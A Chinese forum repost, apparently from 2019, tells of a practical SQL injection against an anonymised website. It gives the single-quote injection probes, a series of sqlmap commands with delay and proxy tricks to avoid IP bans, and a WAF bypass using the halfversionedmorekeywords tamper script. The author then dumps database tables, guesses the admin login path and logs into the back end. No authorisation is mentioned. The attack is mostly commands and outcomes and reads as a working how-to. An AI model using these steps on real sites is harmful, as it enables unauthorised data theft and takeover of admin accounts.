返回列表 发新帖

[文摘] 实战|记一次SQL注入过WAF思路分享

[复制链接]
灌水成绩
971
主题
992
帖子
5892
积分
等级头衔
积分成就
  • 威望: 0
  • 贡献: 4900
  • 金钱: 0
  • 违规:
  • 在线时间:336 小时
  • 注册时间:2019-3-9
  • 最后登录:2020-1-27
个人勋章

官方

联系方式
QQ
发表在  2019-10-26 21:34:38 | 显示全部楼层 | 阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
判断注入点

输入'--> 报错
输入''--> 回显正常
可以确定是使用单引号闭合的

实战|记一次SQL注入过WAF思路分享11872469老黑2669分享,思路,注入,一次,实战,
输入' and '1'='1  --> 回显正常, 可以查询到数据
实战|记一次SQL注入过WAF思路分享11872469老黑2111分享,思路,注入,一次,实战,

输入' and '1'='2 --> 回显正常, 但未查询到数据
可以确定存在注入
实战|记一次SQL注入过WAF思路分享11872469老黑7394分享,思路,注入,一次,实战,

接下来就是跑数据, 直接掏出sqlmap
[size=0.9em]ActionScript

sqlmap -u "http://www.xxx.com?id=2" --batch
一片红!!! nice
再次访问IP已经被封掉了
实战|记一次SQL注入过WAF思路分享11872469老黑5488分享,思路,注入,一次,实战,

根据经验推测应该是因为访问过于频繁导致的
开代理换个IP, 加个延时参数继续
OK, 成功跑出注入点
[size=0.9em]ActionScript

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch
实战|记一次SQL注入过WAF思路分享11872469老黑2735分享,思路,注入,一次,实战,
查询当前数据库用户权限, 不是高权限, 所以只能去找Web后台管理员账号密码
[size=0.9em]ActionScript

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --is-dba
实战|记一次SQL注入过WAF思路分享11872469老黑8096分享,思路,注入,一次,实战,
查询当前数据库, 成功
[size=0.9em]ActionScript

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --current-db
实战|记一次SQL注入过WAF思路分享11872469老黑29分享,思路,注入,一次,实战,
查询表, 失败
[size=0.9em]ActionScript

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [库名 --tables
嗯??? nice
有WAF, 赶紧去访问网站看看IP有没有被封
还好, 没有被封
实战|记一次SQL注入过WAF思路分享11872469老黑2417分享,思路,注入,一次,实战,
显示payload, 看看是哪句被拦截了
[size=0.9em]ActionScript

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [库名 --tables -v 3
可以看到第一次被拦截的payload
实战|记一次SQL注入过WAF思路分享11872469老黑6280分享,思路,注入,一次,实战,
将被拦截的payload的放到浏览器中去访问, 果然被WAF拦截了
实战|记一次SQL注入过WAF思路分享11872469老黑1600分享,思路,注入,一次,实战,
手工模糊测试, 发现被拦截的为关键字: FROM
实战|记一次SQL注入过WAF思路分享11872469老黑8059分享,思路,注入,一次,实战,
这里说下个人思路:
  • 在已经确定是什么WAF的前提下, 网上去查询过相关WAF的思路, 这里我找到了几个, 尝试后还是没有绕过去
  • sqlmap自带有过WAF脚本, 我去查询了下有没有能代替<FROM>的其他关键字, 很遗憾没找到
  • 然后考虑尝试使用编码, 注释类的脚本去过, 经过反复测试, 成功绕过
  • 查询tamper脚本的相关文章链接: 点击打开

<span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">sqlmap </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">-</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">u </span><span class="prism-token prism-string" style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">"http://www.xxx.com?id=2"</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;"> </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">--</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">delay </span><span class="prism-token prism-number" style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">0.2</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;"> </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">--</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">batch </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">-</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">D </span><span class="prism-token prism-punctuation" style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">[</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">库名</span><span class="prism-token prism-punctuation" style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">]</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;"> </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">--</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">tables </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">-</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">v </span><span class="prism-token prism-number" style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">3</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;"> </span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">--</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">tamper</span><span class="prism-token prism-operator" style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; direction: ltr; word-break: normal; overflow-wrap: normal; line-height: 1.5; tab-size: 4; hyphens: none; position: relative;">=</span><span style="background-image: none; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; text-shadow: white 0px 1px; overflow-wrap: normal; line-height: 1.5; position: relative;">halfversionedmorekeywords</span>

[size=1em]
实战|记一次SQL注入过WAF思路分享11872469老黑8982分享,思路,注入,一次,实战,
接下来就简单多了
查询表--tables
实战|记一次SQL注入过WAF思路分享11872469老黑9141分享,思路,注入,一次,实战,
查询列--columns
实战|记一次SQL注入过WAF思路分享11872469老黑325分享,思路,注入,一次,实战,
查询数据--dump
实战|记一次SQL注入过WAF思路分享11872469老黑2168分享,思路,注入,一次,实战,
sqlmap跑数据的同时, 我去找了下后台
因为限制了访问速度, 所以这里我没有选择用御剑等工具去扫, 一般情况下可以先去做下目录扫描
看看有没有robots.txt文件, 404
实战|记一次SQL注入过WAF思路分享11872469老黑7597分享,思路,注入,一次,实战,
搜索引擎搜索一波
实战|记一次SQL注入过WAF思路分享11872469老黑686分享,思路,注入,一次,实战,

找到一个会员登录的页面: 点击打开
额..., 一看会员登录是这种文件名, 管理员后台也不会难找到哪里去
实战|记一次SQL注入过WAF思路分享11872469老黑7679分享,思路,注入,一次,实战,
顺手在login.aspx前加了个admin
http://www.xxx.com/admin/login.aspx
特么的就访问成功了...
所以这里我得出了一个重要的结论: 运气好等于成功了一半 (手动滑稽)
实战|记一次SQL注入过WAF思路分享11872469老黑6579分享,思路,注入,一次,实战,

成功登录, 至此测试结束
这里不再进行深入测试
实战|记一次SQL注入过WAF思路分享11872469老黑1745分享,思路,注入,一次,实战,

文由安全小圈



温馨提示:
1、在论坛里发表的文章仅代表作者本人的观点,与本网站立场无关。
2、论坛的所有内容都不保证其准确性,有效性,时间性。阅读本站内容因误导等因素而造成的损失本站不承担连带责任。
3、当政府机关依照法定程序要求披露信息时,论坛均得免责。
4、若因线路及非本站所能控制范围的故障导致暂停服务期间造成的一切不便与损失,论坛不负任何责任。
5、注册会员通过任何手段和方法针对论坛进行破坏,我们有权对其行为作出处理。并保留进一步追究其责任的权利。
6.添加QQ群随时获取新消息QQ群号:831240632
回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表